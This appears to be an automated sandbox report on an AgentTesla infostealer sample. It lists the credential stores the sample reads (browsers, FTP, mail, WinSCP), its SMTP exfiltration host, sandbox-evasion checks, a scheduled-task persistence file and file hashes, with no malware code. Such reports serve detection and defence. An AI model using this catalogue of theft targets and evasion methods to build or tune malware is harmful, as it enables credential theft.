                      Source: C:\Users\user\Desktop\4019223246.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\4019223246.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\4019223246.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\Desktop\4019223246.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_004129D5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_004129D5
                      Source: C:\Users\user\Desktop\4019223246.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\4019223246.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\4019223246.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\4019223246.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\4019223246.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\4019223246.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\4019223246.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)
                      Source: C:\Users\user\Desktop\4019223246.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\4019223246.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\4019223246.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match File source: 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: 4019223246.exe PID: 6104, type: MEMORY

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_00401EB6 _memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401EB6

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 211 | Scheduled Task/Job 1 | Access Token Manipulation 1 | Disable or Modify Tools 11 | OS Credential Dumping 2 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API 11 | Boot or Logon Initialization Scripts | Process Injection 12 | Deobfuscate/Decode Files or Information 1 | Credentials in Registry 1 | File and Directory Discovery 2 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Scheduled Task/Job 1 | Logon Script (Windows) | Scheduled Task/Job 1 | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 125 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 1 | NTDS | Query Registry 1 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 11 | LSA Secrets | Security Software Discovery 251 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 11 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 14 | Cached Domain Credentials | Virtualization/Sandbox Evasion 14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 12 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

                      Behavior Graph ID: 358326, Sample: 4019223246.exe, Startdate: 25/02/2021, Architecture: WINDOWS, Score: 100

                      Sample signatures: Found malware configuration; Sigma detected: Scheduled temp file as task from temp location; Yara detected AgentTesla; 5 other signatures

                      Process: 4019223246.exe (started)
                        Dropped: C:\Users\user\AppData\...\WZXjvtGBEKK.exe, PE32
                        Dropped: C:\Users\...\WZXjvtGBEKK.exe:Zone.Identifier, ASCII
                        Dropped: C:\Users\user\AppData\Local\Temp\tmp35E.tmp, XML
                        Dropped: C:\Users\user\AppData\...\4019223246.exe.log, ASCII
                        Signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Signature: Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                        Signature: Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

                        Child process: 4019223246.exe (started)
                          DNS/IP: us2.smtp.mailhostbox.com 208.91.198.143, 49767, 587 PUBLIC-DOMAIN-REGISTRYUS United States
                          DNS/IP: 208.91.199.224, 49769, 587 PUBLIC-DOMAIN-REGISTRYUS United States
                          Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Signature: Tries to steal Mail credentials (via file access)
                          Signature: Tries to harvest and steal ftp login credentials
                          Signature: Tries to harvest and steal browser information (history, passwords, etc)

                        Child process: schtasks.exe (started)
                          Child process: conhost.exe (started)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label | Link
4019223246.exe | 100% | Joe Sandbox ML | |

                      Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe | 9% | ReversingLabs | Win32.Trojan.AgentTesla |

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label | Link
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe |
http://DynDns.comDynDNS | 0% | URL Reputation | safe |
http://wg3NmRd1lkGGL4Op.org | 0% | Avira URL Cloud | safe |
http://wg3NmRd1lkGGL4Op.orghb | 0% | Avira URL Cloud | safe |
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe |
http://qpQMsG.com | 0% | Avira URL Cloud | safe |

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.198.143 | true | false | | high

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://wg3NmRd1lkGGL4Op.org | 4019223246.exe, 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://wg3NmRd1lkGGL4Op.orghb | 4019223246.exe, 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 4019223246.exe, 00000001.00000002.658704693.0000000002C41000.00000004.00000001.sdmp | false | | high
http://qpQMsG.com | 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp | false | | high

                            Contacted IPs

                            Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.91.198.143 | unknown | United States | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
208.91.199.224 | unknown | United States | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:358326
                            Start date:25.02.2021
                            Start time:12:15:28
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 35s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:4019223246.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@6/6@2/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 2.7% (good quality ratio 2.4%)
                            • Quality average: 68.5%
                            • Quality standard deviation: 33.2%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 72
                            • Number of non-executed functions: 15
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.211.6.115, 168.61.161.212, 13.64.90.137, 13.88.21.125, 51.11.168.160, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 205.185.216.10, 205.185.216.42, 51.104.139.180
                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
12:16:17 | API Interceptor | 917x Sleep call for process: 4019223246.exe modified

                            Joe Sandbox View / Context

                            IPs


                                                                                                            Domains


                                                                                                            ASN


                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4019223246.exe.log
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):1314
                                                                                                            Entropy (8bit):5.350128552078965
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                            C:\Users\user\AppData\Local\Temp\tmp35E.tmp
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1644
                                                                                                            Entropy (8bit):5.1910277324869165
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGAYtn:cbhK79lNQR/rydbz9I3YODOLNdq3G
                                                                                                            MD5:0436449A8A29D6DDCE3A32F0AFEC9F86
                                                                                                            SHA1:1BA25B0B13158E49344283743E476A5583B7110D
                                                                                                            SHA-256:274CF49E1C8DB4264092964FF5D604E47F20D0F93C5E4C62E4B728EBB8843506
                                                                                                            SHA-512:5DEFAA4B15AD8D4A7BCD2710381B82E9EFC68FC97BB1897BC96B3E4D3DE0227E57A98925D384B9182944C8738657C68533AB40B7CE01992E6094F9DDE91AC640
                                                                                                            Malicious:true
                                                                                                            Reputation:low
                                                                                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                                                            C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):981504
                                                                                                            Entropy (8bit):7.118177937126348
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:CVsJT2fy3BWYR+nwvQILyPB+A+9JqWqi7jDB:ouB0wvngN+Dqg7
                                                                                                            MD5:87E6882BCEBF4823AFB4303AAC3628B1
                                                                                                            SHA1:FA6DF79DD667FCBB97C6FFBF947EE356512B292D
                                                                                                            SHA-256:369D92B64EE7B40F1679B98499E6D2B3470F9D477A8C35256508AE5715516194
                                                                                                            SHA-512:87F490512C0984C98EEDFAF34D97CF8FD7018A4ACE412DF73D61B1274034BCD87BC5B69956125687816AD77CF57951CA656608987233A79858BA0361A1F6890E
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                                            Reputation:low
                                                                                                            C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe:Zone.Identifier
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                            C:\Users\user\AppData\Roaming\o20cyjeo.lhs\Chrome\Default\Cookies
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.7006690334145785
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                                            MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                                            SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                                            SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                                            SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            C:\Windows\assembly\Desktop.ini
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):227
                                                                                                            Entropy (8bit):5.2735028737400205
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:a1eZBXVNYTF0NwoScUbtSgyAXIWv7v5PMKq:UeZBFNYTswUq1r5zq
                                                                                                            MD5:F7F759A5CD40BC52172E83486B6DE404
                                                                                                            SHA1:D74930F354A56CFD03DC91AA96D8AE9657B1EE54
                                                                                                            SHA-256:A709C2551B8818D7849D31A65446DC2F8C4CCA2DCBBC5385604286F49CFDAF1C
                                                                                                            SHA-512:A50B7826BFE72506019E4B1148A214C71C6F4743C09E809EF15CD0E0223F3078B683D203200910B07B5E1E34B94F0FE516AC53527311E2943654BFCEADE53298
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview: ; ==++==..; ..; Copyright (c) Microsoft Corporation. All rights reserved...; ..; ==--==..[.ShellClassInfo]..CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}..ConfirmFileOp=1..InfoTip=Contains application stability information...

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.118177937126348
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                            File name:4019223246.exe
                                                                                                            File size:981504
                                                                                                            MD5:87e6882bcebf4823afb4303aac3628b1
                                                                                                            SHA1:fa6df79dd667fcbb97c6ffbf947ee356512b292d
                                                                                                            SHA256:369d92b64ee7b40f1679b98499e6d2b3470f9d477a8c35256508ae5715516194
                                                                                                            SHA512:87f490512c0984c98eedfaf34d97cf8fd7018a4ace412df73d61b1274034bcd87bc5b69956125687816ad77cf57951ca656608987233a79858ba0361a1f6890e
                                                                                                            SSDEEP:24576:CVsJT2fy3BWYR+nwvQILyPB+A+9JqWqi7jDB:ouB0wvngN+Dqg7

                                                                                                            File Icon

                                                                                                            Icon Hash:e0dad4adc4d2d870

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4ec21e
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                            Time Stamp:0x603772F4 [Thu Feb 25 09:50:44 2021 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xec1d0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xee000 | 0x5200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                            Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xea224 | 0xea400 | False | 0.631924526414 | data | 7.13411382713 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xee000 | 0x5200 | 0x5200 | False | 0.189738948171 | data | 4.23787907322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf4000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xee100 | 0x4228 | dBase III DBT, version number 0, next free block index 40 | |
RT_GROUP_ICON | 0xf2338 | 0x14 | data | |
RT_VERSION | 0xf235c | 0x350 | data | |
RT_MANIFEST | 0xf26bc | 0xb15 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators | |

                                                                                                            Imports

DLL | Import
mscoree.dll | _CorExeMain

                                                                                                            Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2014
Assembly Version | 3.0.0.0
InternalName | ObjectIDGenerator.exe
FileVersion | 3.0.0.0
CompanyName | KTV
